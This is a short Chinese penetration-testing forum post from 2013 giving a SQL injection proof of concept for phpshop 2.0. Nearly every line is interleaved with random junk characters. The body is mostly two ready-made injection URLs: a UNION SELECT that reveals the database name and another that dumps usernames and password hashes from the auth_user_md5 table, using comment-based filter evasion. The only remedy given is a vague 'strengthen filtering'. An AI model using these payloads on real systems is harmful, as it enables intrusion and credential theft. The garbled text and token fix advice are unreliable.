中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]

作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability4 d1 O1 O. A- L9 u
8 F& i5 X, E8 a" B8 D
作者 : By onestree, t- f1 F) a3 \5 ^! j
下载地址 : http://code.google.com/p/phpshop/downloads/list
0 M2 M: x. i; {6 O/ f4 S" }  a测试地址: windows 7 / ubuntu
) ~* [/ [7 p* ]; L$ \. i1 N   |9 b! f4 q& d

* x$ J6 m7 [" J7 G* p/ iSQLi p0c:
8 k$ }) y' ^; S% |- K ( }, Q3 {. I- `" y# y$ ~4 k
==================; I6 \# D" d  Y- s: y* R1 k/ i# U
$ |$ u' F) q! q4 X8 b: A
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
+ ~! Y" s2 _/ w* Z! W, W: G" iunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
3 G8 q% [  {2 ^ 3 U& k. u2 p, S9 [# A
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
; i8 h: n3 I6 w4 i, @4 _% A
; O7 M; b0 n& q- x* g1 P5 |: \修复:8 B- a/ i: T3 ]  E; a* T( {
加强过滤
4 R) H. A* y: ]! c: c: G6 G8 b7 K% I) S4 b3 B* Y9 H  v
$ y4 A) F5 f% i' ]! l





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2